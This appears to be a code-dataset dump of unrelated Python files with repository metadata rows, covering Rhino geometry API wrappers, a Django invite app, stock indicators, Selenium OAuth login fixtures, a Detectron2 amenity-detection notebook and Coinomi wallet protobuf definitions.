args = [brep, facesToRemove, distance, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/createshell-brep_intarray_double_double", args)
return response
def JoinBreps(brepsToJoin, tolerance):
args = [brepsToJoin, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/joinbreps-breparray_double", args)
return response
def MergeBreps(brepsToMerge, tolerance):
args = [brepsToMerge, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/mergebreps-breparray_double", args)
return response
def CreateContourCurves(brepToContour, contourStart, contourEnd, interval):
args = [brepToContour, contourStart, contourEnd, interval]
response = Util.ComputeFetch("rhino/geometry/brep/createcontourcurves-brep_point3d_point3d_double", args)
return response
def CreateContourCurves1(brepToContour, sectionPlane):
args = [brepToContour, sectionPlane]
response = Util.ComputeFetch("rhino/geometry/brep/createcontourcurves-brep_plane", args)
return response
def CreateCurvatureAnalysisMesh(brep, state):
args = [brep, state]
response = Util.ComputeFetch("rhino/geometry/brep/createcurvatureanalysismesh-brep_rhino.applicationsettings.curvatureanalysissettingsstate", args)
return response
def GetRegions(thisBrep):
args = [thisBrep]
response = Util.ComputeFetch("rhino/geometry/brep/getregions-brep", args)
return response
def GetWireframe(thisBrep, density):
args = [thisBrep, density]
response = Util.ComputeFetch("rhino/geometry/brep/getwireframe-brep_int", args)
return response
def ClosestPoint(thisBrep, testPoint):
args = [thisBrep, testPoint]
response = Util.ComputeFetch("rhino/geometry/brep/closestpoint-brep_point3d", args)
return response
def IsPointInside(thisBrep, point, tolerance, strictlyIn):
args = [thisBrep, point, tolerance, strictlyIn]
response = Util.ComputeFetch("rhino/geometry/brep/ispointinside-brep_point3d_double_bool", args)
return response
def CapPlanarHoles(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/capplanarholes-brep_double", args)
return response
def Join(thisBrep, otherBrep, tolerance, compact):
args = [thisBrep, otherBrep, tolerance, compact]
response = Util.ComputeFetch("rhino/geometry/brep/join-brep_brep_double_bool", args)
return response
def JoinNakedEdges(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/joinnakededges-brep_double", args)
return response
def MergeCoplanarFaces(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/mergecoplanarfaces-brep_double", args)
return response
def MergeCoplanarFaces1(thisBrep, tolerance, angleTolerance):
args = [thisBrep, tolerance, angleTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/mergecoplanarfaces-brep_double_double", args)
return response
def Split(thisBrep, splitter, intersectionTolerance):
args = [thisBrep, splitter, intersectionTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/split-brep_brep_double", args)
return response
def Split1(thisBrep, splitter, intersectionTolerance, toleranceWasRaised):
args = [thisBrep, splitter, intersectionTolerance, toleranceWasRaised]
response = Util.ComputeFetch("rhino/geometry/brep/split-brep_brep_double_bool", args)
return response
def Trim(thisBrep, cutter, intersectionTolerance):
args = [thisBrep, cutter, intersectionTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/trim-brep_brep_double", args)
return response
def Trim1(thisBrep, cutter, intersectionTolerance):
args = [thisBrep, cutter, intersectionTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/trim-brep_plane_double", args)
return response
def UnjoinEdges(thisBrep, edgesToUnjoin):
args = [thisBrep, edgesToUnjoin]
response = Util.ComputeFetch("rhino/geometry/brep/unjoinedges-brep_intarray", args)
return response
def JoinEdges(thisBrep, edgeIndex0, edgeIndex1, joinTolerance, compact):
args = [thisBrep, edgeIndex0, edgeIndex1, joinTolerance, compact]
response = Util.ComputeFetch("rhino/geometry/brep/joinedges-brep_int_int_double_bool", args)
return response
def TransformComponent(thisBrep, components, xform, tolerance, timeLimit, useMultipleThreads):
args = [thisBrep, components, xform, tolerance, timeLimit, useMultipleThreads]
response = Util.ComputeFetch("rhino/geometry/brep/transformcomponent-brep_componentindexarray_transform_double_double_bool", args)
return response
def GetArea(thisBrep):
args = [thisBrep]
response = Util.ComputeFetch("rhino/geometry/brep/getarea-brep", args)
return response
def GetArea1(thisBrep, relativeTolerance, absoluteTolerance):
args = [thisBrep, relativeTolerance, absoluteTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/getarea-brep_double_double", args)
return response
def GetVolume(thisBrep):
args = [thisBrep]
response = Util.ComputeFetch("rhino/geometry/brep/getvolume-brep", args)
return response
def GetVolume1(thisBrep, relativeTolerance, absoluteTolerance):
args = [thisBrep, relativeTolerance, absoluteTolerance]
response = Util.ComputeFetch("rhino/geometry/brep/getvolume-brep_double_double", args)
return response
def RebuildTrimsForV2(thisBrep, face, nurbsSurface):
args = [thisBrep, face, nurbsSurface]
response = Util.ComputeFetch("rhino/geometry/brep/rebuildtrimsforv2-brep_brepface_nurbssurface", args)
return response
def MakeValidForV2(thisBrep):
args = [thisBrep]
response = Util.ComputeFetch("rhino/geometry/brep/makevalidforv2-brep", args)
return response
def Repair(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/repair-brep_double", args)
return response
def RemoveHoles(thisBrep, tolerance):
args = [thisBrep, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/removeholes-brep_double", args)
return response
def RemoveHoles1(thisBrep, loops, tolerance):
args = [thisBrep, loops, tolerance]
response = Util.ComputeFetch("rhino/geometry/brep/removeholes-brep_componentindexarray_double", args)
return response
| 40.644711 | 176 | 0.782449 | 2,038 | 20,363 | 7.70265 | 0.119725 | 0.063448 | 0.126895 | 0.153332 | 0.746656 | 0.67499 | 0.562365 | 0.474455 | 0.379157 | 0.31297 | 0 | 0.010664 | 0.125031 | 20,363 | 500 | 177 | 40.726 | 0.870405 | 0 | 0 | 0.348348 | 0 | 0 | 0.264316 | 0.264316 | 0 | 0 | 0 | 0 | 0 | 1 | 0.249249 | false | 0 | 0.003003 | 0 | 0.501502 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1e4bfcf3942358a807f95445f45c826ed6e46a32 | 361 | py | Python | drf_simple_invite/urls.py | mattyg/drf-simple-invite | 7d2b9a512f5e02cc0b492c79689531e2ad67a243 | [
"BSD-3-Clause"
] | 6 | 2019-08-09T06:37:47.000Z | 2022-01-06T08:36:55.000Z | drf_simple_invite/urls.py | thapabishwa/drf_simple_invite | 154d144b45585b748739322c22ef42ac3899646a | [
"BSD-3-Clause"
] | 12 | 2019-07-03T21:12:12.000Z | 2021-06-25T15:24:13.000Z | drf_simple_invite/urls.py | thapabishwa/drf_simple_invite | 154d144b45585b748739322c22ef42ac3899646a | [
"BSD-3-Clause"
] | 3 | 2020-02-07T22:51:52.000Z | 2021-12-17T06:02:46.000Z | from django.conf.urls import url
from rest_framework import routers
from drf_simple_invite.views import SetUserPasswordView, InviteUserView
router = routers.DefaultRouter()
app_name = 'drf_simple_invite'
urlpatterns = [
url(r'^confirm', SetUserPasswordView.as_view(), name='confirm-user'),
url(r'^', InviteUserView.as_view(), name='invite-user'),
]
| 25.785714 | 73 | 0.764543 | 45 | 361 | 5.955556 | 0.555556 | 0.067164 | 0.11194 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113573 | 361 | 13 | 74 | 27.769231 | 0.8375 | 0 | 0 | 0 | 0 | 0 | 0.135734 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.222222 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
1e667ba1e94f3ec1ee3b00e6ac770ad762185aac | 3,342 | py | Python | unit_test.py | danielgriggs/console80 | 7050647a0a6f0fcaa31046a3623c96185e183f96 | [
"MIT"
] | null | null | null | unit_test.py | danielgriggs/console80 | 7050647a0a6f0fcaa31046a3623c96185e183f96 | [
"MIT"
] | null | null | null | unit_test.py | danielgriggs/console80 | 7050647a0a6f0fcaa31046a3623c96185e183f96 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import console80v2
singleton = console80v2.singleIntValue()
print "=== Singleton Time ==="
print ""
print singleton
print ""
print "Set a max number of items in history"
singleton.setMaxHistoryLength(4)
print singleton
print ""
print "Add 0 through 7 to history"
for i in range(1,8):
singleton.updateValue(i)
print singleton
print "Increase the history length"
singleton.setMaxHistoryLength(5)
print "Add 1 through 19 to history"
for i in range(1,20):
singleton.updateValue(i)
print singleton
print ""
print "History statistics"
print "Avg: {}".format(singleton.getHistoryAvg())
print "Max: {}".format(singleton.getHistoryMax())
print "Min: {}".format(singleton.getHistoryMin())
print "Last 1: {}".format(singleton.getHistoryLast())
print "Last 3: {}".format(singleton.getHistoryLast(3))
print ""
print "Get current Value"
print "Current: {}".format(singleton.getValue())
print "Scaled: {}".format(singleton.getScaledValue())
print ""
print "Add values outside the range"
singleton.updateValue(101)
print "Get the value back {}".format(singleton.getValue())
print "Get a scaled value back {}".format(singleton.getScaledValue())
print "Am I clipping {}".format(singleton.isClipped())
print ""
singleton.updateValue(-1)
print "Get the value back {}".format(singleton.getValue())
print "Get a scaled value back {}".format(singleton.getScaledValue())
print "Am I clipping {}".format(singleton.isClipped())
print ""
singleton.updateValue(5)
print singleton
print "Get the value back {}".format(singleton.getValue())
print "Am I clipping {}".format(singleton.isClipped())
print ""
print "Set the range 1 - 10"
singleton.setRange((0,10))
print singleton
print ""
print "Sweep to 10 and back"
for i in range(22):
singleton.sweepValue()
print singleton
print ""
print ""
coord = console80v2.singleCoordValue()
print "=== Co-Ordinates Time ==="
print ""
print coord
print ""
print "Set a max number of items in history to 4"
coord.setMaxHistoryLength(4)
print coord
print ""
print "Add 0 through 7 to history"
for i in range(1,8):
coord.updateValue((i**2,i**2))
print coord
print ""
print "Set a max number of items in history to 5"
coord.setMaxHistoryLength(5)
print coord
print ""
print "Add 1 through 19 to history"
for i in range(4,8):
coord.updateValue((i**2,i**2))
print coord
print ""
print "History statistics"
print "Avg: {}".format(coord.getHistoryAvg())
print "Max: {}".format(coord.getHistoryMax())
print "Min: {}".format(coord.getHistoryMin())
print "Last 1: {}".format(coord.getHistoryLast())
print "Last 3: {}".format(coord.getHistoryLast(3))
print ""
print "Get current Value"
print "Current: {}".format(coord.getValue())
print ""
print "Add values outside the range"
coord.updateValue((101,101))
print "Get the value back {}".format(coord.getValue())
print "Am I clipping {}".format(coord.isClipped())
print ""
coord.updateValue((-1,-1))
print "Get the value back {}".format(coord.getValue())
print "Am I clipping {}".format(coord.isClipped())
print ""
coord.updateValue((0,0))
print "Get the value back {}".format(coord.getValue())
print "Am I clipping {}".format(coord.isClipped())
print ""
print "Set the range -5,-5 - 5,5"
coord.setRange(((-5 , -5) , (5 , 5)))
print coord
print ""
print "Sweep to 5 and back to -5"
for i in range(22):
coord.sweepValue()
print coord
print ""
| 27.85 | 69 | 0.717235 | 467 | 3,342 | 5.132762 | 0.149893 | 0.079266 | 0.050063 | 0.027534 | 0.67209 | 0.592407 | 0.547768 | 0.485607 | 0.468919 | 0.448894 | 0 | 0.027749 | 0.126571 | 3,342 | 119 | 70 | 28.084034 | 0.793422 | 0.004788 | 0 | 0.628319 | 0 | 0 | 0.271523 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.00885 | null | null | 0.761062 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
1e7e6a73854ea7cfa7b06c8d60fbaad94a3a05c7 | 2,588 | py | Python | stock_indicators/indicators/kama.py | LeeDongGeon1996/Stock.Indicators.Python | b706d00279a8ab5f2794417ddef1bf45e1c48587 | [
"Apache-2.0"
] | 13 | 2021-11-09T13:16:31.000Z | 2022-03-28T00:30:30.000Z | stock_indicators/indicators/kama.py | LeeDongGeon1996/Stock.Indicators.Python | b706d00279a8ab5f2794417ddef1bf45e1c48587 | [
"Apache-2.0"
] | 162 | 2021-11-03T15:57:17.000Z | 2022-03-30T15:32:20.000Z | stock_indicators/indicators/kama.py | LeeDongGeon1996/Stock.Indicators.Python | b706d00279a8ab5f2794417ddef1bf45e1c48587 | [
"Apache-2.0"
] | 5 | 2021-11-04T13:35:05.000Z | 2022-01-06T10:27:38.000Z | from decimal import Decimal
from typing import Iterable, Optional, TypeVar
from stock_indicators._cslib import CsIndicator
from stock_indicators._cstypes import List as CsList
from stock_indicators._cstypes import Decimal as CsDecimal
from stock_indicators._cstypes import to_pydecimal
from stock_indicators.indicators.common.helpers import RemoveWarmupMixin
from stock_indicators.indicators.common.results import IndicatorResults, ResultBase
from stock_indicators.indicators.common.quote import Quote
def get_kama(quotes: Iterable[Quote], er_periods: int = 10,
fast_periods: int = 2, slow_periods: int = 30):
"""Get KAMA calculated.
Kaufman’s Adaptive Moving Average (KAMA) is an volatility
adaptive moving average of Close price over configurable lookback periods.
Parameters:
`quotes` : Iterable[Quote]
Historical price quotes.
`er_periods` : int, defaults 10
Number of Efficiency Ratio (volatility) periods.
`fast_periods` : int, defaults 2
Number of periods in the Fast EMA.
`slow_periods` : int, defaults 30
Number of periods in the Slow EMA.
Returns:
`KAMAResults[KAMAResult]`
KAMAResults is list of KAMAResult with providing useful helper methods.
See more:
- [KAMA Reference](https://daveskender.github.io/Stock.Indicators.Python/indicators/Kama/#content)
- [Helper Methods](https://daveskender.github.io/Stock.Indicators.Python/utilities/#content)
"""
results = CsIndicator.GetKama[Quote](CsList(Quote, quotes), er_periods,
fast_periods, slow_periods)
return KAMAResults(results, KAMAResult)
class KAMAResult(ResultBase):
"""
A wrapper class for a single unit of Kaufman’s Adaptive Moving Average (KAMA) results.
"""
@property
def efficiency_ratio(self) -> Optional[float]:
return self._csdata.ER
@efficiency_ratio.setter
def efficiency_ratio(self, value):
self._csdata.ER = value
@property
def kama(self) -> Optional[Decimal]:
return to_pydecimal(self._csdata.Kama)
@kama.setter
def kama(self, value):
self._csdata.Kama = CsDecimal(value)
_T = TypeVar("_T", bound=KAMAResult)
class KAMAResults(RemoveWarmupMixin, IndicatorResults[_T]):
"""
A wrapper class for the list of Kaufman’s Adaptive Moving Average (KAMA) results.
It is exactly same with built-in `list` except for that it provides
some useful helper methods written in CSharp implementation.
"""
| 34.506667 | 107 | 0.704405 | 310 | 2,588 | 5.774194 | 0.341935 | 0.075419 | 0.074302 | 0.043575 | 0.250279 | 0.115642 | 0.097207 | 0.046927 | 0 | 0 | 0 | 0.004936 | 0.217156 | 2,588 | 74 | 108 | 34.972973 | 0.878578 | 0.43238 | 0 | 0.068966 | 0 | 0 | 0.001479 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.172414 | false | 0 | 0.310345 | 0.068966 | 0.655172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
1e8f5c3afab5efd85940a5be757ce5169c8a9811 | 256 | py | Python | dice.py | Jmainguy/pyHackpySlash | 4f54cbb1ac8bb7dbc33301be81f2bd0625f0ff4d | [
"BSD-3-Clause"
] | 1 | 2021-06-12T14:54:28.000Z | 2021-06-12T14:54:28.000Z | dice.py | Jmainguy/pyHackpySlash | 4f54cbb1ac8bb7dbc33301be81f2bd0625f0ff4d | [
"BSD-3-Clause"
] | null | null | null | dice.py | Jmainguy/pyHackpySlash | 4f54cbb1ac8bb7dbc33301be81f2bd0625f0ff4d | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import random
def attackroll():
attackdice = 1
attackdicesides = 20
RANDOM = random.randint(1, attackdicesides)
return RANDOM
def damageroll():
damagedice = 1
damagesides = 6
RANDOM = random.randint(1, damagesides)
return RANDOM
| 18.285714 | 44 | 0.746094 | 31 | 256 | 6.16129 | 0.548387 | 0.094241 | 0.198953 | 0.209424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032407 | 0.15625 | 256 | 13 | 45 | 19.692308 | 0.851852 | 0.0625 | 0 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1e93cfdd86dac61d03e0a272ee87d222f410532d | 326 | py | Python | direct/nn/unet/config.py | iamRyanChia/direct | c3c5e828c22c07e712cb2a4995c47f68a958f13d | [
"Apache-2.0"
] | null | null | null | direct/nn/unet/config.py | iamRyanChia/direct | c3c5e828c22c07e712cb2a4995c47f68a958f13d | [
"Apache-2.0"
] | null | null | null | direct/nn/unet/config.py | iamRyanChia/direct | c3c5e828c22c07e712cb2a4995c47f68a958f13d | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright (c) DIRECT Contributors
from dataclasses import dataclass
from direct.config.defaults import ModelConfig
@dataclass
class UnetModel2dConfig(ModelConfig):
in_channels: int = 2
out_channels: int = 2
num_filters: int = 16
num_pool_layers: int = 4
dropout_probability: float = 0.0
| 23.285714 | 46 | 0.745399 | 43 | 326 | 5.511628 | 0.72093 | 0.092827 | 0.101266 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033835 | 0.184049 | 326 | 13 | 47 | 25.076923 | 0.857143 | 0.141104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.222222 | 0 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
1e963214fc924e438ac7c695dbee017b09a94b67 | 3,490 | py | Python | tests/functional_tests/fixtures/providers.py | chdb/authomatic | 5f02338a9ebc3329fd12f6c67b7047acea4709dc | [
"MIT"
] | null | null | null | tests/functional_tests/fixtures/providers.py | chdb/authomatic | 5f02338a9ebc3329fd12f6c67b7047acea4709dc | [
"MIT"
] | null | null | null | tests/functional_tests/fixtures/providers.py | chdb/authomatic | 5f02338a9ebc3329fd12f6c67b7047acea4709dc | [
"MIT"
] | null | null | null | # encoding: utf-8
import abc
from selenium.webdriver.common.keys import Keys
class BaseProviderFixture(object):
"""
Base class for provider fixtures.
Provides mechanisms of logging the user in by a provider and consenting
to grant access to the tested application.
"""
__metaclass__ = abc.ABCMeta
def __init__(self, login, password):
"""
:param str login:
User login
:param str password:
User password
"""
self.login = login
self.password = password
PRE_LOGIN_CLICKS_XPATH = []
@abc.abstractproperty
def LOGIN_XPATH(self):
pass
@abc.abstractproperty
def PASSWORD_XPATH(self):
pass
@abc.abstractproperty
def CONSENT_XPATHS(self):
pass
@property
def login_function(self):
"""
Fills out and submits provider a login form.
:param str login_xpath:
The XPath of the input element where the user should enter his username.
:param str password_xpath:
The XPath of the input element where the user should enter his password.
:param str login:
The user's username.
:param str password:
The user's password.
"""
def f(browser):
for xpath in self.PRE_LOGIN_CLICKS_XPATH:
print('clicking on {0}'.format(xpath))
browser.find_element_by_xpath(xpath).click()
print('logging the user in.')
browser.find_element_by_xpath(self.LOGIN_XPATH)\
.send_keys(self.login)
password_element = browser.\
find_element_by_xpath(self.PASSWORD_XPATH)
print 'PASSWORD = {0}'.format(self.password)
password_element.send_keys(self.password)
password_element.send_keys(Keys.ENTER)
return f
@property
def consent_function(self):
"""
Clicks a consent button specified by the XPath if it exists recursively.
:param str xpath:
The XPath of the consent button.
"""
def f(browser):
for path in self.CONSENT_XPATHS:
try:
button = browser.find_element_by_xpath(path)
print('Hitting consent button.')
button.click()
f(browser)
except Exception as e:
print('No consent needed.')
pass
return f
class BitlyFixture(BaseProviderFixture):
PRE_LOGIN_CLICKS_XPATH = ['//*[@id="oauth_access"]/form/div/div[1]/a']
LOGIN_XPATH = '//*[@id="username"]'
PASSWORD_XPATH = '//*[@id="password"]'
CONSENT_XPATHS = ['//*[@id="oauth_access"]/form/button[1]']
class DeviantART(BaseProviderFixture):
LOGIN_XPATH = '//*[@id="username"]'
PASSWORD_XPATH = '//*[@id="password"]'
CONSENT_XPATHS = [
'//*[@id="terms_agree"]',
'//*[@id="authorize_form"]/fieldset/div[2]/div[2]/a[1]',
]
class FacebookFixture(BaseProviderFixture):
LOGIN_XPATH = '//*[@id="email"]'
PASSWORD_XPATH = '//*[@id="pass"]'
CONSENT_XPATHS = [
'//*[@id="platformDialogForm"]/div[2]/div/table/tbody/tr/td[2]/'
'button[1]',
]
class GoogleFixture(BaseProviderFixture):
LOGIN_XPATH = '//*[@id="Email"]'
PASSWORD_XPATH = '//*[@id="Passwd"]'
CONSENT_XPATHS = [
'//*[@id="submit_approve_access"]',
]
| 26.641221 | 84 | 0.57765 | 381 | 3,490 | 5.125984 | 0.291339 | 0.032258 | 0.036866 | 0.040963 | 0.305172 | 0.270353 | 0.168971 | 0.168971 | 0.116743 | 0.116743 | 0 | 0.004542 | 0.306017 | 3,490 | 130 | 85 | 26.846154 | 0.801817 | 0.004298 | 0 | 0.285714 | 0 | 0.014286 | 0.18876 | 0.096124 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.228571 | 0.028571 | null | null | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
1e97335310dcfac8d0fa86edf318c4df60dac6c3 | 4,063 | py | Python | Dectron2/Algo/amenity_algo.py | ashwath007/aminity-detection | acb885eb4d791acc6e65237445a4fc6830e4d30c | [
"Apache-2.0"
] | 1 | 2021-01-18T11:18:25.000Z | 2021-01-18T11:18:25.000Z | Dectron2/Algo/amenity_algo.py | ashwath007/aminity-detection | acb885eb4d791acc6e65237445a4fc6830e4d30c | [
"Apache-2.0"
] | null | null | null | Dectron2/Algo/amenity_algo.py | ashwath007/aminity-detection | acb885eb4d791acc6e65237445a4fc6830e4d30c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""amenity_algo.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1JjXRbubKgw6DvQcbRjw9WcdrTYdOrPAC
"""
# Commented out IPython magic to ensure Python compatibility.
!pip install -U torch==1.4+cu100 torchvision==0.5+cu100 -f https://download.pytorch.org/whl/torch_stable.html
!pip install cython pyyaml==5.1
!pip install -U 'git+https://github.com/cocodataset/cocoapi.git#subdirectory=PythonAPI'
!pip install awscli
!pip install pillow==4.1.1
# %reload_ext autoreload
# %autoreload
import torch, torchvision
torch.__version__
!gcc --version
!pip install detectron2 -f https://dl.fbaipublicfiles.com/detectron2/wheels/cu100/index.html
# Some basic setup:
# Setup detectron2 logger
import detectron2
from detectron2.utils.logger import setup_logger
setup_logger() # this logs Detectron2 information such as what the model is doing when it's training
# import some common libraries
import numpy as np
import pandas as pd
from tqdm import tqdm
import cv2
import random
from google.colab.patches import cv2_imshow
# import some common detectron2 utilities
from detectron2 import model_zoo # a series of pre-trained Detectron2 models: https://github.com/facebookresearch/detectron2/blob/master/MODEL_ZOO.md
from detectron2.engine import DefaultPredictor # a default predictor class to make predictions on an image using a trained model
from detectron2.config import get_cfg # a config of "cfg" in Detectron2 is a series of instructions for building a model
from detectron2.utils.visualizer import Visualizer # a class to help visualize Detectron2 predictions on an image
from detectron2.data import MetadataCatalog # stores information about the model such as what the training/test data is, what the class names are
img = cv2.imread("./demo.jpeg")
cv2_imshow(img)
# Download the trained model
!wget https://storage.googleapis.com/airbnb-amenity-detection-storage/airbnb-amenity-detection/open-images-data/retinanet_model_final/retinanet_model_final.pth
# Download the train model config (instructions on how the model was built)
!wget https://storage.googleapis.com/airbnb-amenity-detection-storage/airbnb-amenity-detection/open-images-data/retinanet_model_final/retinanet_model_final_config.yaml
# Target classes with spaces removed
target_classes = ['Bathtub',
'Bed',
'Billiard table',
'Ceiling fan',
'Coffeemaker',
'Couch',
'Countertop',
'Dishwasher',
'Fireplace',
'Fountain',
'Gas stove',
'Jacuzzi',
'Kitchen & dining room table',
'Microwave oven',
'Mirror',
'Oven',
'Pillow',
'Porch',
'Refrigerator',
'Shower',
'Sink',
'Sofa bed',
'Stairs',
'Swimming pool',
'Television',
'Toilet',
'Towel',
'Tree house',
'Washing machine',
'Wine rack']
cfg = get_cfg() # setup a default config, see: https://detectron2.readthedocs.io/modules/config.html
cfg.merge_from_file("./retinanet_model_final_config.yaml") # merge the config YAML file (a set of instructions on how to build a model)
cfg.MODEL.WEIGHTS = "./retinanet_model_final.pth" # setup the model weights from the fully trained model
# Create a default Detectron2 predictor for making inference
predictor = DefaultPredictor(cfg)
# Make a prediction the example image from above
outputs = predictor(img)
# Number of predicted amenities to draw on the target image
num_amenities = 7
# Set up a visulaizer instance: https://detectron2.readthedocs.io/modules/utils.html#detectron2.utils.visualizer.Visualizer
visualizer = Visualizer(img_rgb=img[:, :, ::-1], # we have to reverse the color order otherwise we'll get blue images (BGR -> RGB)
metadata=MetadataCatalog.get(cfg.DATASETS.TEST[0]).set(thing_classes=target_classes), # we tell the visualizer what classes we're drawing (from the target classes)
scale=0.7)
# Draw the models predictions on the target image
visualizer = visualizer.draw_instance_predictions(outputs["instances"][:num_amenities].to("cpu"))
# Display the image
cv2_imshow(visualizer.get_image()[:, :, ::-1])
| 36.936364 | 187 | 0.769136 | 567 | 4,063 | 5.439153 | 0.432099 | 0.019455 | 0.036965 | 0.008431 | 0.120947 | 0.085603 | 0.085603 | 0.085603 | 0.085603 | 0.085603 | 0 | 0.01501 | 0.130938 | 4,063 | 109 | 188 | 37.275229 | 0.858397 | 0.39429 | 0 | 0 | 1 | 0 | 0.187943 | 0.027482 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.205882 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
1e977843f31b2c38edfe91b35579fdea382bb1a9 | 10,172 | py | Python | walletlib/coinomi_proto.py | satoshi-n/walletlib | 272ddf0a974a4da0f417eed632e9d028ee19bf79 | [
"Unlicense"
] | null | null | null | walletlib/coinomi_proto.py | satoshi-n/walletlib | 272ddf0a974a4da0f417eed632e9d028ee19bf79 | [
"Unlicense"
] | null | null | null | walletlib/coinomi_proto.py | satoshi-n/walletlib | 272ddf0a974a4da0f417eed632e9d028ee19bf79 | [
"Unlicense"
] | null | null | null | # Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: coinomiwallet.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import List
import betterproto
class KeyType(betterproto.Enum):
ORIGINAL = 1
ENCRYPTED_SCRYPT_AES = 2
DETERMINISTIC_MNEMONIC = 3
DETERMINISTIC_KEY = 4
class TransactionConfidenceType(betterproto.Enum):
UNKNOWN = 0
BUILDING = 1
PENDING = 2
DEAD = 3
class TransactionConfidenceSource(betterproto.Enum):
SOURCE_UNKNOWN = 0
SOURCE_NETWORK = 1
SOURCE_SELF = 2
SOURCE_TRUSTED = 3
class TransactionPool(betterproto.Enum):
UNSPENT = 4
SPENT = 5
DEAD = 10
PENDING = 16
class WalletEncryptionType(betterproto.Enum):
UNENCRYPTED = 1
ENCRYPTED_SCRYPT_AES = 2
ENCRYPTED_AES = 3
@dataclass
class PeerAddress(betterproto.Message):
ip_address: bytes = betterproto.bytes_field(1)
port: int = betterproto.uint32_field(2)
services: int = betterproto.uint64_field(3)
@dataclass
class EncryptedData(betterproto.Message):
initialisation_vector: bytes = betterproto.bytes_field(1)
encrypted_private_key: bytes = betterproto.bytes_field(2)
@dataclass
class DeterministicKey(betterproto.Message):
"""
* Data attached to a Key message that defines the data needed by the BIP32
deterministic key hierarchy algorithm.
"""
# Random data that allows us to extend a key. Without this, we can't figure
# out the next key in the chain and should just treat it as a regular
# ORIGINAL type key.
chain_code: bytes = betterproto.bytes_field(1)
# The path through the key tree. Each number is encoded in the standard form:
# high bit set for private derivation and high bit unset for public
# derivation.
path: List[int] = betterproto.uint32_field(2)
# How many children of this key have been issued, that is, given to the user
# when they requested a fresh key? For the parents of keys being handed out,
# this is always less than the true number of children: the difference is
